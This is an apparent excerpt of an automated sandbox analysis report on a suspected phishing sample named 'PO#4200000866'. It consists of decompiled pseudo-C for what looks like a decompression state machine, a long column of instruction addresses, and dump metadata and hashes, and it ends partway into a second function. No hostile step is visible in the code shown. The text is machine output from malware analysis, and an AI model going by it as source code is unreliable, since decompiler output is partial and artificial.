                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												_t283 = __ebp - 0x64;
                                                                                      												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      												__eflags =  *_t283;
                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                      												L79:
                                                                                      												 *(__ebp - 0x14) = __edx;
                                                                                      												goto L80;
                                                                                      											case 0x1c:
                                                                                      												while(1) {
                                                                                      													L123:
                                                                                      													__eflags =  *(__ebp - 0x64);
                                                                                      													if( *(__ebp - 0x64) == 0) {
                                                                                      														break;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                      														__eflags = __eax;
                                                                                      													}
                                                                                      													__edx =  *(__ebp - 8);
                                                                                      													__cl =  *(__eax + __edx);
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													 *(__ebp - 0x5c) = __cl;
                                                                                      													 *(__eax + __edx) = __cl;
                                                                                      													__eax = __eax + 1;
                                                                                      													__edx = 0;
                                                                                      													_t414 = __eax %  *(__ebp - 0x74);
                                                                                      													__eax = __eax /  *(__ebp - 0x74);
                                                                                      													__edx = _t414;
                                                                                      													__eax =  *(__ebp - 0x68);
                                                                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      													__eflags =  *(__ebp - 0x30);
                                                                                      													 *( *(__ebp - 0x68)) = __cl;
                                                                                      													 *(__ebp - 0x14) = _t414;
                                                                                      													if( *(__ebp - 0x30) > 0) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														L80:
                                                                                      														 *(__ebp - 0x88) = 2;
                                                                                      														goto L1;
                                                                                      													}
                                                                                      												}
                                                                                      												 *(__ebp - 0x88) = 0x1c;
                                                                                      												goto L170;
                                                                                      										}
                                                                                      									}
                                                                                      									L171:
                                                                                      									_t544 = _t543 | 0xffffffff;
                                                                                      									goto L172;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					goto L1;
                                                                                      				}
                                                                                      			}














                                                                                      0x00000000
                                                                                      0x00406ffe
                                                                                      0x00406ffe
                                                                                      0x00407002
                                                                                      0x00407023
                                                                                      0x0040702a
                                                                                      0x00407030
                                                                                      0x00407036
                                                                                      0x00407048
                                                                                      0x0040704e
                                                                                      0x00407053
                                                                                      0x00000000
                                                                                      0x00407004
                                                                                      0x0040700a
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x00407420
                                                                                      0x004075cf
                                                                                      0x004075e5
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x004075f6
                                                                                      0x004075fd
                                                                                      0x00407601
                                                                                      0x00407601
                                                                                      0x0040742c
                                                                                      0x00407433
                                                                                      0x0040743b
                                                                                      0x0040743e
                                                                                      0x00407441
                                                                                      0x00407441
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406bec
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x00000000
                                                                                      0x00406bfd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c06
                                                                                      0x00406c09
                                                                                      0x00406c0c
                                                                                      0x00406c10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c16
                                                                                      0x00406c19
                                                                                      0x00406c1b
                                                                                      0x00406c1c
                                                                                      0x00406c1f
                                                                                      0x00406c21
                                                                                      0x00406c22
                                                                                      0x00406c24
                                                                                      0x00406c27
                                                                                      0x00406c2c
                                                                                      0x00406c31
                                                                                      0x00406c3a
                                                                                      0x00406c4d
                                                                                      0x00406c50
                                                                                      0x00406c5c
                                                                                      0x00406c84
                                                                                      0x00406c86
                                                                                      0x00406c94
                                                                                      0x00406c94
                                                                                      0x00406c98
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c88
                                                                                      0x00406c8b
                                                                                      0x00406c8c
                                                                                      0x00406c8c
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c62
                                                                                      0x00406c67
                                                                                      0x00406c67
                                                                                      0x00406c70
                                                                                      0x00406c78
                                                                                      0x00406c7b
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406ca2
                                                                                      0x0040754e
                                                                                      0x00000000
                                                                                      0x0040754e
                                                                                      0x00406cab
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00406cc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cca
                                                                                      0x00406cd0
                                                                                      0x00406cfa
                                                                                      0x00406d00
                                                                                      0x00406d07
                                                                                      0x00000000
                                                                                      0x00406d07
                                                                                      0x00406cd6
                                                                                      0x00406cd9
                                                                                      0x00406cde
                                                                                      0x00406cde
                                                                                      0x00406ce9
                                                                                      0x00406cf1
                                                                                      0x00406cf4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d39
                                                                                      0x00406d3f
                                                                                      0x00406d42
                                                                                      0x00406d4f
                                                                                      0x00406d57
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d0e
                                                                                      0x00406d0e
                                                                                      0x00406d12
                                                                                      0x0040755d
                                                                                      0x00000000
                                                                                      0x0040755d
                                                                                      0x00406d1e
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d2c
                                                                                      0x00406d2f
                                                                                      0x00406d32
                                                                                      0x00406d37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d5f
                                                                                      0x00406d61
                                                                                      0x00406d64
                                                                                      0x00406dd5
                                                                                      0x00406dd8
                                                                                      0x00406ddb
                                                                                      0x00406de2
                                                                                      0x00406dec
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x00406d66
                                                                                      0x00406d6a
                                                                                      0x00406d6d
                                                                                      0x00406d6f
                                                                                      0x00406d72
                                                                                      0x00406d75
                                                                                      0x00406d77
                                                                                      0x00406d7a
                                                                                      0x00406d7c
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d87
                                                                                      0x00406d8b
                                                                                      0x00406d92
                                                                                      0x00406d95
                                                                                      0x00406d9c
                                                                                      0x00406da0
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406dac
                                                                                      0x00406daf
                                                                                      0x00406dcd
                                                                                      0x00406dcf
                                                                                      0x00000000
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406db4
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbf
                                                                                      0x00406dc2
                                                                                      0x00406dc4
                                                                                      0x00406dc5
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407068
                                                                                      0x0040706c
                                                                                      0x0040708f
                                                                                      0x00407092
                                                                                      0x00407095
                                                                                      0x0040709f
                                                                                      0x0040706e
                                                                                      0x0040706e
                                                                                      0x00407071
                                                                                      0x00407074
                                                                                      0x00407077
                                                                                      0x00407084
                                                                                      0x00407087
                                                                                      0x00407087
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004070ab
                                                                                      0x004070af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070b5
                                                                                      0x004070b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070bf
                                                                                      0x004070c1
                                                                                      0x004070c5
                                                                                      0x004070c5
                                                                                      0x004070c8
                                                                                      0x004070cc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040711c
                                                                                      0x00407120
                                                                                      0x00407127
                                                                                      0x0040712a
                                                                                      0x0040712d
                                                                                      0x00407137
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00407122
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407143
                                                                                      0x00407147
                                                                                      0x0040714e
                                                                                      0x00407151
                                                                                      0x00407154
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407157
                                                                                      0x0040715a
                                                                                      0x0040715d
                                                                                      0x0040715d
                                                                                      0x00407160
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407170
                                                                                      0x00407175
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407203
                                                                                      0x00407203
                                                                                      0x00407207
                                                                                      0x004075a5
                                                                                      0x00000000
                                                                                      0x004075a5
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407220
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407225
                                                                                      0x00407228
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406df8
                                                                                      0x00406df8
                                                                                      0x00406dfc
                                                                                      0x00407569
                                                                                      0x00000000
                                                                                      0x00407569
                                                                                      0x00406e02
                                                                                      0x00406e05
                                                                                      0x00406e08
                                                                                      0x00406e0c
                                                                                      0x00406e0f
                                                                                      0x00406e15
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e1a
                                                                                      0x00406e1d
                                                                                      0x00406e1d
                                                                                      0x00406e20
                                                                                      0x00406e23
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e29
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e35
                                                                                      0x00406e35
                                                                                      0x00406e39
                                                                                      0x00406e3c
                                                                                      0x00406e3f
                                                                                      0x00406e42
                                                                                      0x00406e45
                                                                                      0x00406e46
                                                                                      0x00406e49
                                                                                      0x00406e4b
                                                                                      0x00406e51
                                                                                      0x00406e54
                                                                                      0x00406e57
                                                                                      0x00406e5a
                                                                                      0x00406e5d
                                                                                      0x00406e60
                                                                                      0x00406e63
                                                                                      0x00406e7f
                                                                                      0x00406e82
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8f
                                                                                      0x00406e93
                                                                                      0x00406e95
                                                                                      0x00406e99
                                                                                      0x00406e65
                                                                                      0x00406e65
                                                                                      0x00406e69
                                                                                      0x00406e71
                                                                                      0x00406e76
                                                                                      0x00406e78
                                                                                      0x00406e7a
                                                                                      0x00406e7a
                                                                                      0x00406e9c
                                                                                      0x00406ea3
                                                                                      0x00406ea6
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eb1
                                                                                      0x00406eb1
                                                                                      0x00406eb5
                                                                                      0x00407575
                                                                                      0x00000000
                                                                                      0x00407575
                                                                                      0x00406ebb
                                                                                      0x00406ebe
                                                                                      0x00406ec1
                                                                                      0x00406ec5
                                                                                      0x00406ec8
                                                                                      0x00406ece
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed3
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406edc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ede
                                                                                      0x00406ee1
                                                                                      0x00406ee4
                                                                                      0x00406ee7
                                                                                      0x00406eea
                                                                                      0x00406eed
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00406ef6
                                                                                      0x00406ef9
                                                                                      0x00406efc
                                                                                      0x00406f14
                                                                                      0x00406f17
                                                                                      0x00406f1a
                                                                                      0x00406f1d
                                                                                      0x00406f1d
                                                                                      0x00406f20
                                                                                      0x00406f24
                                                                                      0x00406f26
                                                                                      0x00406efe
                                                                                      0x00406efe
                                                                                      0x00406f06
                                                                                      0x00406f0b
                                                                                      0x00406f0d
                                                                                      0x00406f0f
                                                                                      0x00406f0f
                                                                                      0x00406f29
                                                                                      0x00406f30
                                                                                      0x00406f33
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00406f33
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f75
                                                                                      0x00406f75
                                                                                      0x00406f79
                                                                                      0x00407581
                                                                                      0x00000000
                                                                                      0x00407581
                                                                                      0x00406f7f
                                                                                      0x00406f82
                                                                                      0x00406f85
                                                                                      0x00406f89
                                                                                      0x00406f8c
                                                                                      0x00406f92
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f97
                                                                                      0x00406f9a
                                                                                      0x00406f9a
                                                                                      0x00406fa0
                                                                                      0x00406f3e
                                                                                      0x00406f3e
                                                                                      0x00406f41
                                                                                      0x00000000
                                                                                      0x00406f41
                                                                                      0x00406fa2
                                                                                      0x00406fa2
                                                                                      0x00406fa5
                                                                                      0x00406fa8
                                                                                      0x00406fab
                                                                                      0x00406fae
                                                                                      0x00406fb1
                                                                                      0x00406fb4
                                                                                      0x00406fb7
                                                                                      0x00406fba
                                                                                      0x00406fbd
                                                                                      0x00406fc0
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe1
                                                                                      0x00406fe1
                                                                                      0x00406fe4
                                                                                      0x00406fe8
                                                                                      0x00406fea
                                                                                      0x00406fc2
                                                                                      0x00406fc2
                                                                                      0x00406fca
                                                                                      0x00406fcf
                                                                                      0x00406fd1
                                                                                      0x00406fd3
                                                                                      0x00406fd3
                                                                                      0x00406fed
                                                                                      0x00406ff4
                                                                                      0x00406ff7
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00407286
                                                                                      0x00407286
                                                                                      0x0040728a
                                                                                      0x004075b1
                                                                                      0x00000000
                                                                                      0x004075b1
                                                                                      0x00407290
                                                                                      0x00407293
                                                                                      0x00407296
                                                                                      0x0040729a
                                                                                      0x0040729d
                                                                                      0x004072a3
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407056
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x00407395
                                                                                      0x00407399
                                                                                      0x004073bb
                                                                                      0x004073be
                                                                                      0x004073c8
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x0040739b
                                                                                      0x0040739e
                                                                                      0x004073a2
                                                                                      0x004073a5
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407452
                                                                                      0x00407456
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x0040747b
                                                                                      0x00407482
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00407458
                                                                                      0x0040745b
                                                                                      0x0040745e
                                                                                      0x00407461
                                                                                      0x00407468
                                                                                      0x004073ac
                                                                                      0x004073ac
                                                                                      0x004073af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407543
                                                                                      0x00407546
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040717d
                                                                                      0x0040717f
                                                                                      0x00407186
                                                                                      0x00407187
                                                                                      0x00407189
                                                                                      0x0040718c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407194
                                                                                      0x00407197
                                                                                      0x0040719a
                                                                                      0x0040719c
                                                                                      0x0040719e
                                                                                      0x0040719e
                                                                                      0x0040719f
                                                                                      0x004071a2
                                                                                      0x004071a9
                                                                                      0x004071ac
                                                                                      0x004071ba
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040749f
                                                                                      0x0040749f
                                                                                      0x004074a3
                                                                                      0x004075db
                                                                                      0x00000000
                                                                                      0x004075db
                                                                                      0x004074a9
                                                                                      0x004074ac
                                                                                      0x004074af
                                                                                      0x004074b3
                                                                                      0x004074b6
                                                                                      0x004074bc
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074c1
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c7
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x0040752b
                                                                                      0x0040752e
                                                                                      0x00407533
                                                                                      0x00407534
                                                                                      0x00407536
                                                                                      0x00407538
                                                                                      0x0040753b
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x0040744d
                                                                                      0x00407447
                                                                                      0x004074cd
                                                                                      0x004074d3
                                                                                      0x004074d6
                                                                                      0x004074d9
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074eb
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x0040750d
                                                                                      0x00407510
                                                                                      0x00407514
                                                                                      0x00407516
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074f8
                                                                                      0x004074fd
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x0040751d
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x004071c2
                                                                                      0x004071c5
                                                                                      0x004071fb
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407331
                                                                                      0x00407333
                                                                                      0x004075bd
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x00407339
                                                                                      0x0040733c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407342
                                                                                      0x00407346
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x004071c7
                                                                                      0x004071c9
                                                                                      0x004071cb
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d5
                                                                                      0x004071d8
                                                                                      0x004071db
                                                                                      0x004071f1
                                                                                      0x004071f6
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x0040725e
                                                                                      0x00407260
                                                                                      0x00407267
                                                                                      0x0040726a
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000
                                                                                      0x004075fa
                                                                                      0x00407447
                                                                                      0x004073ce
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x00407002

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                      • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                      • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                      • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E0040711C() {
                                                                                      				unsigned short _t531;
                                                                                      				signed int _t532;
                                                                                      				void _t533;
                                                                                      				signed int _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t589;
                                                                                      				signed int* _t606;
                                                                                      				void* _t613;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                      						 *(_t613 - 0x84) = 0xb;
                                                                                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                      						goto L132;
                                                                                      					} else {
                                                                                      						__eax =  *(__ebp - 0x28);
                                                                                      						L88:
                                                                                      						 *(__ebp - 0x2c) = __eax;
                                                                                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      						L89:
                                                                                      						__eax =  *(__ebp - 4);
                                                                                      						 *(__ebp - 0x80) = 0x15;
                                                                                      						__eax =  *(__ebp - 4) + 0xa68;
                                                                                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      						L69:
                                                                                      						 *(__ebp - 0x84) = 0x12;
                                                                                      						while(1) {
                                                                                      							L132:
                                                                                      							 *(_t613 - 0x54) = _t606;
                                                                                      							while(1) {
                                                                                      								L133:
                                                                                      								_t531 =  *_t606;
                                                                                      								_t589 = _t531 & 0x0000ffff;
